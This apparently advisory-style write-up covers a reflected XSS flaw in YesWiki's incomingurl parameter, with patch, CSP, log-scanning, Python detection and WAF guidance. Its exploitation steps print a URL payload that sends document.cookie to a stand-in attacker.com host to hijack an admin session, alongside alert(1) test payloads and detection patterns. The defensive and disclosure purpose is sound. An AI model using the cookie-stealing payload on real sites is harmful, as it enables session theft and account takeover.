How the CVE Works
This vulnerability in YesWiki (versions before 4.5.4) allows reflected cross-site scripting (XSS) via the `incomingurl` parameter of the `/PagePrincipale/deletepage` endpoint. When an admin visits a crafted URL whose `incomingurl` value carries a script payload (e.g., `"><script>alert(1)</script>`), the value is reflected into the response without being encoded, so the injected JavaScript executes in the victim's browser. Because the endpoint never encodes this user-supplied input, an attacker who tricks an admin into clicking such a link can run script in the admin's session, for example to hijack the session, steal cookies, or deface pages.
DailyCVE Form
Platform: YesWiki
Version: <4.5.4
Vulnerability: Reflected XSS
Severity: Medium
Date: 2023-XX-XX
What Undercode Say:
Exploitation
1. Craft malicious URL:
https://yeswiki.net/?PagePrincipale%2Fdeletepage&incomingurl="><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Social-engineer admin to click link.
3. Capture session cookies via attacker-controlled server.
Protection
1. Update to YesWiki ≥ v4.5.4.
2. HTML-encode `incomingurl` wherever it is reflected into the page (encode on output, for the HTML/attribute context it lands in):
$clean_url = htmlspecialchars($_GET['incomingurl'] ?? '', ENT_QUOTES, 'UTF-8');
3. Deploy a Content Security Policy (CSP) that forbids inline script; a policy that allows 'unsafe-inline' would not stop this reflected payload:
Content-Security-Policy: default-src 'self'; script-src 'self'
4. Mark the session cookie HttpOnly (and Secure) so injected script cannot read it:
Set-Cookie: sessionid=xxx; HttpOnly; Secure
Detection
Scan your own instance for the reflection with an XSS scanner such as XSStrike; the parameter under test is supplied in the URL (XSStrike's `--params` flag is a switch for parameter discovery and takes no value):
python3 xsstrike.py -u "https://yeswiki.net/?PagePrincipale%2Fdeletepage&incomingurl=test"
Log Analysis
Check server logs for `incomingurl` values carrying markup, whether literal or percent-encoded (the raw access log usually holds the encoded form):
grep -iE 'incomingurl=[^ &]*(%3C|%3E|%22|<|>|")' /var/log/nginx/access.log
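As an added example (not from the original post or the YesWiki project), the same log check carried out in Python so that percent-encoded and double-encoded payloads in the `incomingurl` parameter are caught, which a single-pass grep misses. The log lines are constructed and the IPs and host names are placeholders.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed nginx access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /?PagePrincipale/deletepage&incomingurl=https://wiki.example.org/PagePrincipale HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:10:00:07 +0000] "GET /?PagePrincipale%2Fdeletepage&incomingurl=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:10:00:09 +0000] "GET /?PagePrincipale/deletepage&incomingurl=x%2522%253E%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 480 "-" "curl/8.0"
198.51.100.2 - - [10/Jan/2024:10:01:00 +0000] "GET /?PagePrincipale HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP and request target out of a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
# Markup that has no business in a URL-valued parameter: a tag opener,
# a javascript: scheme, or an on*= event-handler attribute.
XSS_MARKERS = re.compile(r'''(?i)(<\s*/?[a-z]|javascript\s*:|[\s"']on[a-z]+\s*=)''')

def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    payload (%253C -> %3C -> <) is seen in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_incomingurl_requests(log_text):
    """Return (client_ip, decoded_incomingurl) for every request whose
    incomingurl parameter contains HTML/JS markup after full decoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        if "?" not in target:
            continue
        # YesWiki puts the page/action as a bare key, so keep blank values
        params = parse_qs(target.split("?", 1)[1], keep_blank_values=True)
        for raw in params.get("incomingurl", []):
            decoded = fully_decode(raw)
            if XSS_MARKERS.search(decoded):
                hits.append((ip, decoded))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_incomingurl_requests(SAMPLE_LOG):
        print(f"{ip}\t{value}")
```

A benign `incomingurl` that is itself a URL produces no hit, so the output can be fed straight into an alert without further filtering.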
Mitigation
Deploy a WAF rule that inspects `incomingurl` after URL-decoding and case-folding, so encoded or mixed-case variants of the payload are also blocked:
SecRule ARGS:incomingurl "@rx <\s*script" "id:1001,phase:2,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Reflected XSS attempt in incomingurl'"
Sources:
Reported By: github.com